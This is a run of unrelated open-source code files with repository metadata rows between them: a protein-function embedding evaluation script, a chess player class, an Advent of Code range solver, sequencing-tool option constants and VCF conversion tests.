return "Node(%s, %d)" % (self.go, self.size)
def __hash__(self):
return hash(self.go)
def __eq__(self, other):
if isinstance(other, Node):
return self.go == other.go
else:
return False
def __ne__(self, other):
return not self.__eq__(other)
def is_leaf(self):
return len(self.children) == 0
def is_root(self):
return len(self.fathers) == 0
@property
def cousins(self):
ret = set()
for father in self.fathers:
ret |= set(father.children)
return ret - {self}
@property
def ancestors(self):
if not self._ancestors:
self._ancestors = get_ancestors(self)
return self._ancestors
@property
def descendants(self):
if not self._descendants:
self._descendants = get_descendants(self)
return self._descendants
@property
def plus(self):
if not self._plus:
union = sequences_of(self.children)
assert len(union) <= self.size
self._plus = list(self.sequences - union)
return self._plus
@property
def size(self):
return len(self.sequences)
@property
def f_dist_out(self):
if self._f_dist_out:
return self._f_dist_out
else:
raise(KeyError("f_dist_out not computed for %s" % self))
@property
def f_dist_in(self):
if self._f_dist_in:
return self._f_dist_in
else:
raise(KeyError("f_dist_in not computed for %s" % self))
def sample(self, m):
n = min(self.size, m)
sequences = self.sequences
s = set(np.random.choice(sequences, n, replace=False))
assert len(s) == n > 0
return s
def get_ancestors(node):
Q = [node]
visited = {node}
while Q:
curr = Q.pop()
for father in curr.fathers:
if father in visited or father.is_root():
continue
visited.add(father)
Q.append(father)
return visited
def get_descendants(node):
Q = [node]
visited = {node}
while Q:
curr = Q.pop()
for child in curr.children:
if child in visited:
continue
visited.add(child)
Q.append(child)
return visited
def sequences_of(nodes):
return reduce(lambda s1, s2: s1 | s2,
map(lambda node: node.sequences, nodes), set())
def compute_node_prior(node, graph, grace=0.0):
node.prior = grace + (1 - grace) * node.size / len(graph.sequences)
class Graph(object):
def __init__(self, onto, uid2seq, go2ids, grace=0.5):
self._nodes = nodes = {}
self.sequences = sequences = set()
# self.onto = onto
nodes[onto.root] = self.root = Node(onto.root, set(), [], [])
for go, ids in go2ids.items():
seqs = set([Seq(uid, uid2seq[uid]) for uid in ids])
nodes[go] = Node(go, seqs, [], [])
sequences |= seqs
for go, obj in onto._graph._node.items():
if 'is_a' not in obj:
assert go == onto.root
continue
if go not in go2ids:
assert go not in nodes
continue
if go not in nodes:
assert go not in go2ids
continue
for father in obj['is_a']:
nodes[go].fathers.append(nodes[father])
nodes[father].children.append(nodes[go])
for node in nodes.values():
if node.is_leaf():
assert node.size > 0
continue
children = node.children
for child in children:
assert child.size > 0
node.sequences |= child.sequences
for node in nodes.values():
compute_node_prior(node, self, grace)
def prune(self, gte):
to_be_deleted = []
for go, node in self._nodes.items():
if node.size >= gte:
continue
for father in node.fathers:
father.children.remove(node)
for child in node.children:
child.fathers.remove(node)
to_be_deleted.append(node)
for node in to_be_deleted:
del self._nodes[node.go]
return to_be_deleted
def __len__(self):
return len(self._nodes)
def __iter__(self):
for node in self._nodes.values():
yield node
def __getitem__(self, go):
return self._nodes[go]
def __contains__(self, go):
return go in self._nodes
@property
def leaves(self):
return [node for node in self if node.is_leaf()]
@property
def nodes(self):
return list(self._nodes.values())
def sample(self, max_add_to_sample=10):
def sample_recursive(node, sampled):
if not node.is_leaf():
for child in node.children:
sampled |= sample_recursive(child, sampled)
plus = node.plus
s = min(max_add_to_sample, len(plus))
if s > 0:
sampled |= set(np.random.choice(plus, s, replace=False))
return sampled
return sample_recursive(self.root, set())
def sample_pairs(nodes, include_node, sample_size=10000):
pairs = set()
pbar = tqdm(range(len(nodes)), desc="nodes sampled")
for node in nodes:
pbar.update(1)
s_in = min(200, node.size)
sample_in = np.random.choice(list(node.sequences), s_in, replace=False)
if include_node:
pairs |= set((seq1, seq2, node) for seq1, seq2 in itertools.combinations(sample_in, 2))
else:
pairs |= set((seq1, seq2) for seq1, seq2 in itertools.combinations(sample_in, 2))
pbar.close()
n = len(pairs)
pairs_indices = np.random.choice(list(range(n)), min(n, sample_size), replace=False)
return np.asarray(list(pairs))[pairs_indices, :]
def sample_pairs_iou(graph, sample_size=10000):
data = set()
leaf_pairs = list(itertools.combinations(list(graph.leaves), 2))
n = len(leaf_pairs)
indices = np.random.choice(list(range(n)), sample_size, replace=False)
pbar = tqdm(range(len(indices)), desc="nodes sampled")
for leaf1, leaf2 in np.asarray(leaf_pairs)[indices, :]:
intersection = leaf1.ancestors & leaf2.ancestors
union = leaf1.ancestors | leaf2.ancestors
iou = len(intersection) / len(union)
iou = 2 * iou - 1 # scale to [-1, 1]
sequences1 = list(leaf1.sequences - leaf2.sequences)
sequences2 = list(leaf2.sequences - leaf1.sequences)
s1 = min(len(sequences1), 100)
sample1 = np.random.choice(list(sequences1), s1, replace=False) if sequences1 else []
s2 = min(len(sequences2), 100)
sample2 = np.random.choice(list(sequences2), s2, replace=False) if sequences2 else []
data |= set((seq1, seq2, leaf1, 1) for seq1, seq2 in itertools.combinations(sample1, 2))
data |= set((seq1, seq2, leaf2, 1) for seq1, seq2 in itertools.combinations(sample2, 2))
data |= set((seq1, seq2, leaf1, iou) for seq1 in sample1 for seq2 in sample2)
data |= set((seq2, seq1, leaf2, iou) for seq2 in sample2 for seq1 in sample1)
pbar.update(1)
pbar.close()
n = len(data)
indices = np.random.choice(list(range(n)), min(n, sample_size), replace=False)
return np.asarray(list(data))[indices, :]
def sample_pos_neg_no_common_ancestors(graph, sample_size=10000):
pos, neg = set(), set()
root_children = set(graph.root.children)
seq2nodes = {}
for node in graph:
for seq in node.sequences:
if seq in seq2nodes:
seq2nodes[seq].add(node)
else:
seq2nodes[seq] = {node}
pbar = tqdm(range(len(graph)), desc="nodes sampled")
for node in graph:
pbar.update(1)
if not node.is_leaf():
continue
list_in = list(node.sequences)
s_in = min(100, len(list_in))
sample_in = np.random.choice(list_in, s_in, replace=False)
pos |= set((seq1, seq2, node) for seq1, seq2 in itertools.combinations(sample_in, 2))
non_ancestors = root_children - node.ancestors
if not non_ancestors:
continue
distant = np.random.choice(list(non_ancestors))
for child in distant.descendants:
if not child.is_leaf():
continue
list_out = list(filter(lambda s: node not in seq2nodes[s], child.sequences))
if not list_out:
continue
s_out = min(100, len(list_out))
sample_out = np.random.choice(list_out, s_out, replace=False)
neg |= set((seq1, seq2, distant) for seq1 in sample_out for seq2 in sample_in)
pbar.close()
n, m = len(pos), len(neg)
pos_indices = np.random.choice(list(range(n)), min(n, sample_size), replace=False)
neg_indices = np.random.choice(list(range(m)), min(m, sample_size), replace=False)
return np.asarray(list(pos))[pos_indices, :], np.asarray(list(neg))[neg_indices, :]
def sample_pos_neg(graph, sample_size=10000):
pos, neg = set(), set()
pbar = tqdm(range(len(graph)), desc="nodes sampled")
for node in graph:
pbar.update(1)
if not node.is_leaf():
continue
s_in = min(100, node.size)
sample_in = np.random.choice(list(node.sequences), s_in, replace=False)
pos |= set((seq1, seq2, node) for seq1, seq2 in itertools.combinations(sample_in, 2))
for cousin in node.cousins:
cousin_sequences = cousin.sequences - node.sequences
if not cousin_sequences:
continue
s_out = min(100, len(cousin_sequences))
sample_out = np.random.choice(list(cousin_sequences), s_out, replace=False)
neg |= set((seq1, seq2, cousin) for seq1 in sample_out for seq2 in sample_in)
pbar.close()
n, m = len(pos), len(neg)
pos_indices = np.random.choice(list(range(n)), min(n, sample_size), replace=False)
neg_indices = np.random.choice(list(range(m)), min(m, sample_size), replace=False)
return np.asarray(list(pos))[pos_indices, :], np.asarray(list(neg))[neg_indices, :]
def run_metric_on_triplets(metric, triplets, verbose=True):
data = []
n = len(triplets)
if verbose:
pbar = tqdm(range(n), desc="triplets processed")
for i, (seq1, seq2, node) in enumerate(triplets):
data.append(metric(seq1, seq2, node))
if verbose:
pbar.update(1)
if verbose:
pbar.close()
return data
def run_metric_on_pairs(metric, pairs, verbose=True):
data = []
n = len(pairs)
if verbose:
pbar = tqdm(range(n), desc="triplets processed")
for i, (seq, node) in enumerate(pairs):
data.append(metric(seq, node))
if verbose:
pbar.update(1)
if verbose:
pbar.close()
return data
def l2_norm(seq, node):
vec = node.seq2vec[seq]
return np.linalg.norm(vec)
def cosine_similarity(seq1, seq2, node):
vec1 = node.seq2vec[seq1]
vec2 = node.seq2vec[seq2]
ret = fast_cosine_similarity(vec1, [vec2])
return ret[0]
def fast_cosine_similarity(vector, vectors, scale_zero_one=False):
vectors = np.asarray(vectors)
dotted = vectors.dot(vector)
matrix_norms = np.linalg.norm(vectors, axis=1)
vector_norm = np.linalg.norm(vector)
matrix_vector_norms = np.multiply(matrix_norms, vector_norm)
neighbors = np.divide(dotted, matrix_vector_norms).ravel()
if scale_zero_one:
return (neighbors + 1) / 2
else:
return neighbors
def kolmogorov_smirnov_cosine(pos, neg, metric):
data1 = run_metric_on_triplets(metric, pos)
data2 = run_metric_on_triplets(metric, neg)
save_object(data1, "Data/dingo_%s_ks_cosine_pos_data" % asp)
save_object(data2, "Data/dingo_%s_ks_cosine_neg_data" % asp)
return ks_2samp(data1, data2)
def kolmogorov_smirnov_norm(pos, neg, metric):
data1 = run_metric_on_pairs(metric, pos)
data2 = run_metric_on_pairs(metric, neg)
save_object(data1, "Data/dingo_%s_ks_norm_pos_data" % asp)
save_object(data2, "Data/dingo_%s_ks_norm_neg_data" % asp)
return ks_2samp(data1, data2)
if __name__ == "__main__":
cleanup()
from pymongo import MongoClient
client = MongoClient('mongodb://localhost:27017/')
db = client['prot2vec']
asp = 'F' # molecular function
onto = get_ontology(asp)
t0 = datetime.datetime(2014, 1, 1, 0, 0)
t1 = datetime.datetime(2014, 9, 1, 0, 0)
# t0 = datetime.datetime(2017, 1, 1, 0, 0)
# t1 = datetime.datetime.utcnow()
print("Indexing Data...")
trn_stream, tst_stream = get_training_and_validation_streams(db, t0, t1, asp)
print("Loading Training Data...")
uid2seq_trn, _, go2ids_trn = trn_stream.to_dictionaries(propagate=True)
print("Loading Validation Data...")
uid2seq_tst, _, go2ids_tst = tst_stream.to_dictionaries(propagate=True)
print("Building Graph...")
graph = Graph(onto, uid2seq_trn, go2ids_trn)
print("Graph contains %d nodes" % len(graph))
print("Load DigoNet")
go_embedding_weights = np.asarray([onto.todense(go) for go in onto.classes])
net = AttnDecoder(ATTN, 100, 10, go_embedding_weights)
net = net.cuda()
# ckpth = "/tmp/digo_0.01438.tar"
ckpth = "/tmp/digo_0.15157.tar"
print("=> loading checkpoint '%s'" % ckpth)
checkpoint = torch.load(ckpth, map_location=lambda storage, loc: storage)
net.load_state_dict(checkpoint['net'])
print("Running K-S tests...")
pos, neg = sample_pos_neg(graph)
data_pos, data_neg = [], []
for (p_s1, p_s2, p_n), (n_s1, n_s2, n_n) in zip(pos, neg):
data_pos.append((p_s1, p_n))
data_pos.append((p_s2, p_n))
data_neg.append((n_s1, n_n))
data_neg.append((n_s2, n_n))
compute_vectors(data_pos, net, onto)
compute_vectors(data_neg, net, onto)
res = kolmogorov_smirnov_norm(data_pos, data_neg, l2_norm)
print("K-S l2_norm: %s, %s" % res)
res = kolmogorov_smirnov_cosine(pos, neg, cosine_similarity)
print("K-S cosine: %s, %s" % res)
| mit | -2,146,032,486,321,290,800 | 30.200326 | 99 | 0.577909 | false |
erget/KingSnake | king_snake/player.py | 1 | 3615 | """A chess player."""
from king_snake.errors import (FieldMustBeCastledError,
FieldOccupiedError,
IllegalMoveError,
PawnMustCaptureError,
TurnError)
from king_snake.figures import Pawn, Rook, Knight, Bishop, Queen, King
class Player(object):
"""A chess player."""
def __repr__(self):
return "Player()"
def __str__(self):
if self.chessboard:
return_string = ("{color} Player on "
"{chessboard}\n"
"Figures: "
"{figures}".format(color=self.color,
chessboard=self.chessboard,
figures=self.figures))
else:
return_string = self.__repr__()
return return_string
def __init__(self):
self.chessboard = None
self.figures = None
self.king = None
self.color = None
@property
def opponent(self):
"""Return other player in chess game"""
if self.color == "white":
return self.chessboard.players["black"]
else:
return self.chessboard.players["white"]
def set_up_board(self, chessboard):
"""Set up pieces on given chessboard and find other player."""
self.chessboard = chessboard
if self == self.chessboard.players["white"]:
self.color = "white"
else:
self.color = "black"
self.figures = list(Pawn(self) for pawns in range(8))
for doubled_piece in (Rook, Knight, Bishop) * 2:
self.figures.append(doubled_piece(self))
self.figures.append(Queen(self))
self.king = King(self)
self.figures.append(self.king)
def move(self, start, goal):
"""
Move a piece to a new field.
First verify if self is the chessboard's current player. Then check if
a moveable figure is located at the start field. If the piece can be
moved, move to the goal field, capturing a figure at the goal field if
necessary. Finally, check if the move would put the own king in check.
If yes, roll back the move. Otherwise, record the current turn on all
moved pieces and end the turn.
@param start_field - String used to look up field object (e.g. "E2")
@param goal_field - Like start_field
"""
if self != self.chessboard.current_player:
raise TurnError("Move attempted out of turn.")
start_field = self.chessboard.fields[start]
goal_field = self.chessboard.fields[goal]
figure = start_field.figure
if not figure in self.figures:
raise IllegalMoveError("Player does not own a piece at given "
"position.")
try:
figure.move(goal_field)
captured_piece = None
except (FieldOccupiedError, PawnMustCaptureError):
captured_piece = figure.capture(goal_field)
except FieldMustBeCastledError:
captured_piece = figure.castle(goal_field)
if self.king.in_check:
self.chessboard.rollback()
raise IllegalMoveError("Move would put player's king in check.")
figure.already_moved = True
figure.last_moved = self.chessboard.current_move
if captured_piece:
captured_piece.last_moved = self.chessboard.current_move
self.chessboard.end_turn(start, goal)
| gpl-3.0 | -8,314,341,011,309,242,000 | 35.515152 | 78 | 0.561549 | false |
madfist/aoc2016 | aoc2016/day20/main.py | 1 | 1033 | import sys
import re
def prepare(data):
ranges = []
for d in data.split('\n'):
m = re.match(r'(\d+)-(\d+)', d)
ranges.append([int(m.group(1)), int(m.group(2))])
return sorted(ranges, key=lambda r:r[0])
def get_lowest(data):
sr = prepare(data)
high = sr[0][1]
for i in range(1,len(sr)):
if sr[i][0] > high+1:
return high+1
high = max(high, sr[i][1])
def count_all(data):
sr = prepare(data)
high = sr[0][1]
count = 0
for i in range(1,len(sr)):
if high+1 < sr[i][0]:
count += sr[i][0] - high - 1
high = max(sr[i][1], high)
if high < 4294967295:
count += 4294967295 - high
return count
def main():
if (len(sys.argv) < 2):
print("Usage: python3", sys.argv[0], "<data>")
exit(1)
with open(sys.argv[1], 'r') as input:
data = input.read()
print("Lowest available:", get_lowest(data))
print("Available addresses:", count_all(data))
if __name__ == '__main__':
main() | mit | 201,707,456,742,472,450 | 24.219512 | 57 | 0.518877 | false |
statbio/Sargasso | sargasso/separator/options.py | 1 | 1111 | import logging
DATA_TYPE_ARG = "<data-type>"
SAMPLES_FILE_ARG = "<samples-file>"
OUTPUT_DIR_ARG = "<output-dir>"
SPECIES_ARG = "<species>"
SPECIES_INFO_ARG = "<species-info>"
READS_BASE_DIR = "--reads-base-dir"
NUM_THREADS = "--num-threads"
MISMATCH_THRESHOLD = "--mismatch-threshold"
MISMATCH_THRESHOLD_ARG = "<mismatch-threshold>"
MINMATCH_THRESHOLD = "--minmatch-threshold"
MINMATCH_THRESHOLD_ARG = "<minmatch-threshold>"
MULTIMAP_THRESHOLD = "--multimap-threshold"
MULTIMAP_THRESHOLD_ARG = "<multimap-threshold>"
REJECT_MULTIMAPS = "--reject-multimaps"
OPTIMAL_STRATEGY = "--best"
CONSERVATIVE_STRATEGY = "--conservative"
RECALL_STRATEGY = "--recall"
PERMISSIVE_STRATEGY = "--permissive"
RUN_SEPARATION = "--run-separation"
DELETE_INTERMEDIATE = "--delete-intermediate"
MAPPER_EXECUTABLE = "--mapper-executable"
MAPPER_INDEX_EXECUTABLE = "--mapper-index-executable"
SAMBAMBA_SORT_TMP_DIR = "--sambamba-sort-tmp-dir"
SPECIES_NAME = "species-name"
GTF_FILE = "gtf-file"
GENOME_FASTA = "genome-fasta"
MAPPER_INDEX = "mapper-index"
SAMPLE_INFO_INDEX = "sample_info"
SPECIES_OPTIONS_INDEX = "species_options"
| mit | 2,915,778,257,924,116,500 | 32.666667 | 53 | 0.734473 | false |
latticelabs/Mitty | mitty/tests/lib/vcf2pop_test.py | 1 | 11185 | import numpy as np
from numpy.testing import assert_array_equal
import mitty.lib.vcf2pop as vcf2pop
import mitty.lib.mio as mio
import mitty.lib.variants as vr
import mitty.tests
import os
import tempfile
def round_trip_test():
"""vcf <-> mitty database round trip"""
genome_metadata = [
{'seq_id': 'NC_010127.1', 'seq_len': 422616, 'seq_md5': 'fe4be2f3bc5a7754085ceaa39a5c0414'},
{'seq_id': 'NC_010128.1', 'seq_len': 457013, 'seq_md5': '99880025dcbcba5dbf72f437092903c3'},
{'seq_id': 'NC_010129.1', 'seq_len': 481791, 'seq_md5': 'a3a5142f08b313f645cd5e972f5f3397'},
{'seq_id': 'NC_010130.1', 'seq_len': 513455, 'seq_md5': 'ec8ff24820287d35c2b615fbb0df721c'},
]
variant_data = [
{'pos': [1, 100, 200], 'stop': [2, 101, 201], 'ref': ['A', 'C', 'G'], 'alt': ['G', 'T', 'C'], 'p': [0.5, 0.5, 0.5]},
{'pos': [1, 100, 200], 'stop': [2, 101, 201], 'ref': ['A', 'C', 'G'], 'alt': ['G', 'T', 'C'], 'p': [0.5, 0.5, 0.5]},
]
genotype_data = [
[(0, 2), (2, 0)],
[(1, 2), (2, 0)],
]
master_lists = {n + 1: vr.VariantList(vd['pos'], vd['stop'], vd['ref'], vd['alt'], vd['p']) for n, vd in enumerate(variant_data)}
for k, v in master_lists.iteritems(): v.sort()
pop = vr.Population(mode='w', genome_metadata=genome_metadata, in_memory=True)
for k, v in master_lists.iteritems():
pop.set_master_list(chrom=k, master_list=v)
for n in [0, 1]:
pop.add_sample_chromosome(n + 1, 'brown_fox', np.array(genotype_data[n], dtype=[('index', 'i4'), ('gt', 'i1')]))
_, vcf_temp = tempfile.mkstemp(dir=mitty.tests.data_dir, suffix='.vcf.gz')
_, h5_temp = tempfile.mkstemp(dir=mitty.tests.data_dir, suffix='.h5')
mio.write_single_sample_to_vcf(pop, out_fname=vcf_temp, sample_name='brown_fox')
pop2 = vcf2pop.vcf_to_pop(vcf_temp, h5_temp, sample_name='brown_fox')
# for k, v in master_lists.iteritems():
# assert_array_equal(pop.get_sample_variant_index_for_chromosome(k, 'brown_fox'), pop2.get_sample_variant_index_for_chromosome(k, 'brown_fox'))
for n in [0, 1]: # Chromosomes
for v1, v2 in zip(pop2.get_sample_variant_index_for_chromosome(n + 1, 'brown_fox'), genotype_data[n]):
assert v1[1] == v2[1] # Genotypes match
for k in ['pos', 'stop', 'ref', 'alt']:
assert pop2.get_variant_master_list(n + 1).variants[v1[0]][k] == master_lists[n + 1].variants[v2[0]][k] # Variant data match
os.remove(vcf_temp)
def vcf_reader_test1():
"""VCF with no GT data"""
_vcf = """##fileformat=VCFv4.1
##contig=<ID=NC_010142.1,length=908485,md5=9a28f270df93bb4ac0764676de1866b3>
##contig=<ID=NC_010143.1,length=1232258,md5=ab882206d71bc36051f437e66246da6b>
##contig=<ID=NC_010144.1,length=1253087,md5=ab11fdfc260a2b78fdb845d89c7a89f2>
##contig=<ID=NC_010145.1,length=1282939,md5=b3c4b1a7b3671e2e8d4f4b1d2b599c44>
##contig=<ID=NC_010146.1,length=1621617,md5=3dbe62009f563fd1a6e3eadc15617e5c>
#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO
NC_010142.1\t100\t.\tA\tT\t50\tPASS\tRS=672601345;RSPOS=1014319;VP=0x050060001205000002110200;GENEINFO=ISG15:9636;dbSNPBuildID=142;SAO=1;SSR=0;WGT=1;VC=DIV;PM;NSF;REF;ASP;LSD;OM;CLNHGVS=NC_000001.11:g.1014319dupG;CLNALLE=1;CLNSRC=OMIM_Allelic_Variant;CLNORIGIN=1;CLNSRCID=147571.0002;CLNSIG=5;CLNDSDB=MedGen:OMIM:Orphanet;CLNDSDBID=CN221808:616126:ORPHA319563;CLNDBN=Immunodeficiency_38;CLNREVSTAT=no_assertion_criteria_provided;CLNACC=RCV000148989.5
NC_010142.1\t120\t.\tA\tACT\t50\tPASS\tRS=672601345;RSPOS=1014319;VP=0x050060001205000002110200;GENEINFO=ISG15:9636;dbSNPBuildID=142;SAO=1;SSR=0;WGT=1;VC=DIV;PM;NSF;REF;ASP;LSD;OM;CLNHGVS=NC_000001.11:g.1014319dupG;CLNALLE=1;CLNSRC=OMIM_Allelic_Variant;CLNORIGIN=1;CLNSRCID=147571.0002;CLNSIG=5;CLNDSDB=MedGen:OMIM:Orphanet;CLNDSDBID=CN221808:616126:ORPHA319563;CLNDBN=Immunodeficiency_38;CLNREVSTAT=no_assertion_criteria_provided;CLNACC=RCV000148989.5
NC_010142.1\t140\t.\tACT\tA\t50\tPASS\tRS=672601345;RSPOS=1014319;VP=0x050060001205000002110200;GENEINFO=ISG15:9636;dbSNPBuildID=142;SAO=1;SSR=0;WGT=1;VC=DIV;PM;NSF;REF;ASP;LSD;OM;CLNHGVS=NC_000001.11:g.1014319dupG;CLNALLE=1;CLNSRC=OMIM_Allelic_Variant;CLNORIGIN=1;CLNSRCID=147571.0002;CLNSIG=5;CLNDSDB=MedGen:OMIM:Orphanet;CLNDSDBID=CN221808:616126:ORPHA319563;CLNDBN=Immunodeficiency_38;CLNREVSTAT=no_assertion_criteria_provided;CLNACC=RCV000148989.5
NC_010146.1\t100\t.\tA\tT\t50\tPASS\tRS=672601345;RSPOS=1014319;VP=0x050060001205000002110200;GENEINFO=ISG15:9636;dbSNPBuildID=142;SAO=1;SSR=0;WGT=1;VC=DIV;PM;NSF;REF;ASP;LSD;OM;CLNHGVS=NC_000001.11:g.1014319dupG;CLNALLE=1;CLNSRC=OMIM_Allelic_Variant;CLNORIGIN=1;CLNSRCID=147571.0002;CLNSIG=5;CLNDSDB=MedGen:OMIM:Orphanet;CLNDSDBID=CN221808:616126:ORPHA319563;CLNDBN=Immunodeficiency_38;CLNREVSTAT=no_assertion_criteria_provided;CLNACC=RCV000148989.5
"""
vcf_name = os.path.join(mitty.tests.data_dir, 'vcf1.vcf')
db_name = os.path.join(mitty.tests.data_dir, 't1.h5')
open(vcf_name, 'w').write(_vcf)
p = vcf2pop.vcf_to_pop(vcf_fname=vcf_name, pop_fname=db_name)
assert p.get_chromosome_list() == [1, 2, 3, 4, 5], p.get_chromosome_list()
assert p.get_sample_names() == ['anon']
vl = p.get_sample_variant_list_for_chromosome(1,'anon')
assert_array_equal(vl[0], vl[1], vl)
assert vl[0][0]['pos'] == 99
vl = p.get_sample_variant_list_for_chromosome(2, 'anon')
assert vl[0].size == 0
vl = p.get_sample_variant_list_for_chromosome(5,'anon')
assert_array_equal(vl[0], vl[1], vl)
def vcf_reader_test2():
"""VCF with only GT data"""
_vcf = """##fileformat=VCFv4.1
##contig=<ID=NC_010142.1,length=908485,md5=9a28f270df93bb4ac0764676de1866b3>
##contig=<ID=NC_010143.1,length=1232258,md5=ab882206d71bc36051f437e66246da6b>
##contig=<ID=NC_010144.1,length=1253087,md5=ab11fdfc260a2b78fdb845d89c7a89f2>
##contig=<ID=NC_010145.1,length=1282939,md5=b3c4b1a7b3671e2e8d4f4b1d2b599c44>
##contig=<ID=NC_010146.1,length=1621617,md5=3dbe62009f563fd1a6e3eadc15617e5c>
##FORMAT=<ID=GT,Number=1,Type=String,Description="Genotype">
#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\tFORMAT\ts1
NC_010142.1\t100\t.\tA\tT\t50\tPASS\t.\tGT\t0|1
NC_010142.1\t120\t.\tA\tACT\t50\tPASS\t.\tGT\t1|0
NC_010142.1\t140\t.\tACT\tA\t50\tPASS\t.\tGT\t1|1
NC_010146.1\t100\t.\tA\tT\t50\tPASS\t.\tGT\t.
"""
vcf_name = os.path.join(mitty.tests.data_dir, 'vcf2.vcf')
db_name = os.path.join(mitty.tests.data_dir, 't2.h5')
open(vcf_name, 'w').write(_vcf)
p = vcf2pop.vcf_to_pop(vcf_fname=vcf_name, pop_fname=db_name)
vl = p.get_sample_variant_list_for_chromosome(1, 's1')
assert vl[0][0]['pos'] == 119
assert vl[0][0]['stop'] == 120
assert vl[1][1]['pos'] == 139
assert vl[1][1]['stop'] == 142
assert vl[0].size == 2
assert vl[1].size == 2
def vcf_reader_test3():
"""VCF with GT data and some other fields"""
_vcf = """##fileformat=VCFv4.1
##contig=<ID=NC_010142.1,length=908485,md5=9a28f270df93bb4ac0764676de1866b3>
##contig=<ID=NC_010143.1,length=1232258,md5=ab882206d71bc36051f437e66246da6b>
##contig=<ID=NC_010144.1,length=1253087,md5=ab11fdfc260a2b78fdb845d89c7a89f2>
##contig=<ID=NC_010145.1,length=1282939,md5=b3c4b1a7b3671e2e8d4f4b1d2b599c44>
##contig=<ID=NC_010146.1,length=1621617,md5=3dbe62009f563fd1a6e3eadc15617e5c>
##FORMAT=<ID=GT,Number=1,Type=String,Description="Genotype">
##FORMAT=<ID=GL,Number=3,Type=Float,Description="Likelihoods for RR,RA,AA genotypes (R=ref,A=alt)">
#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\tFORMAT\ts1
NC_010142.1\t100\t.\tA\tT\t50\tPASS\t.\tGT:GL\t0|1:41,0,57
NC_010142.1\t120\t.\tA\tACT\t50\tPASS\t.\tGT:GL\t1|0:41,0,57
NC_010142.1\t140\t.\tACT\tA\t50\tPASS\t.\tGT:GL\t1|1:41,0,57
NC_010146.1\t100\t.\tA\tT\t50\tPASS\t.\tGT:GL\t.:41,0,57
"""
vcf_name = os.path.join(mitty.tests.data_dir, 'vcf2.vcf')
db_name = os.path.join(mitty.tests.data_dir, 't2.h5')
open(vcf_name, 'w').write(_vcf)
p = vcf2pop.vcf_to_pop(vcf_fname=vcf_name, pop_fname=db_name)
vl = p.get_sample_variant_list_for_chromosome(1, 's1')
assert vl[0][0]['pos'] == 119
assert vl[0][0]['stop'] == 120
assert vl[1][1]['pos'] == 139
assert vl[1][1]['stop'] == 142
assert vl[0].size == 2
assert vl[1].size == 2
def vcf_reader_test4():
"""VCF with no genome metadata"""
_vcf = """##fileformat=VCFv4.1
##FORMAT=<ID=GT,Number=1,Type=String,Description="Genotype">
##FORMAT=<ID=GL,Number=3,Type=Float,Description="Likelihoods for RR,RA,AA genotypes (R=ref,A=alt)">
#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\tFORMAT\ts1
NC_010142.1\t100\t.\tA\tT\t50\tPASS\t.\tGT:GL\t0|1:41,0,57
NC_010142.1\t120\t.\tA\tACT\t50\tPASS\t.\tGT:GL\t1|0:41,0,57
NC_010142.1\t140\t.\tACT\tA\t50\tPASS\t.\tGT:GL\t1|1:41,0,57
NC_010146.1\t100\t.\tA\tT\t50\tPASS\t.\tGT:GL\t.:41,0,57
"""
vcf_name = os.path.join(mitty.tests.data_dir, 'vcf2.vcf')
db_name = os.path.join(mitty.tests.data_dir, 't2.h5')
open(vcf_name, 'w').write(_vcf)
genome_metadata = [
{'seq_id': 'NC_010142.1', 'seq_len': 908485, 'seq_md5': '9a28f270df93bb4ac0764676de1866b3'},
{'seq_id': 'NC_010143.1', 'seq_len': 1232258, 'seq_md5': 'ab882206d71bc36051f437e66246da6b'},
{'seq_id': 'NC_010144.1', 'seq_len': 1253087, 'seq_md5': 'ab11fdfc260a2b78fdb845d89c7a89f2'},
{'seq_id': 'NC_010145.1', 'seq_len': 1282939, 'seq_md5': 'b3c4b1a7b3671e2e8d4f4b1d2b599c44'},
{'seq_id': 'NC_010146.1', 'seq_len': 1621617, 'seq_md5': '3dbe62009f563fd1a6e3eadc15617e5c'}
]
p = vcf2pop.vcf_to_pop(vcf_fname=vcf_name, pop_fname=db_name, genome_metadata=genome_metadata)
vl = p.get_sample_variant_list_for_chromosome(1, 's1')
assert vl[0][0]['pos'] == 119
assert vl[0][0]['stop'] == 120
assert vl[1][1]['pos'] == 139
assert vl[1][1]['stop'] == 142
assert vl[0].size == 2
assert vl[1].size == 2
def vcf_reader_test5():
"""VCF with multiple samples"""
_vcf = """##fileformat=VCFv4.1
##contig=<ID=NC_010142.1,length=908485,md5=9a28f270df93bb4ac0764676de1866b3>
##contig=<ID=NC_010143.1,length=1232258,md5=ab882206d71bc36051f437e66246da6b>
##contig=<ID=NC_010144.1,length=1253087,md5=ab11fdfc260a2b78fdb845d89c7a89f2>
##contig=<ID=NC_010145.1,length=1282939,md5=b3c4b1a7b3671e2e8d4f4b1d2b599c44>
##contig=<ID=NC_010146.1,length=1621617,md5=3dbe62009f563fd1a6e3eadc15617e5c>
##FORMAT=<ID=GT,Number=1,Type=String,Description="Genotype">
#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\tFORMAT\ts1\ts2
NC_010142.1\t100\t.\tA\tT\t50\tPASS\t.\tGT\t0|1\t1|0
NC_010142.1\t120\t.\tA\tACT\t50\tPASS\t.\tGT\t1|0\t0|1
NC_010142.1\t140\t.\tACT\tA\t50\tPASS\t.\tGT\t1|1\t0|0
NC_010146.1\t100\t.\tA\tT\t50\tPASS\t.\tGT\t.\t1|1
"""
vcf_name = os.path.join(mitty.tests.data_dir, 'vcf2.vcf')
db_name = os.path.join(mitty.tests.data_dir, 't2.h5')
open(vcf_name, 'w').write(_vcf)
p = vcf2pop.vcf_to_pop(vcf_fname=vcf_name, pop_fname=db_name)
vl = p.get_sample_variant_list_for_chromosome(1, 's1')
assert vl[0][0]['pos'] == 119
assert vl[0][0]['stop'] == 120
assert vl[1][1]['pos'] == 139
assert vl[1][1]['stop'] == 142
assert vl[0].size == 2
assert vl[1].size == 2
db_name = os.path.join(mitty.tests.data_dir, 't3.h5')
p = vcf2pop.vcf_to_pop(vcf_fname=vcf_name, pop_fname=db_name, sample_name='s2')
vl = p.get_sample_variant_list_for_chromosome(1, 's2')
assert vl[1][0]['pos'] == 119
assert vl[1][0]['stop'] == 120
assert vl[0].size == 1
assert vl[1].size == 1 | gpl-2.0 | -6,210,237,791,864,790,000 | 48.277533 | 452 | 0.699687 | false |
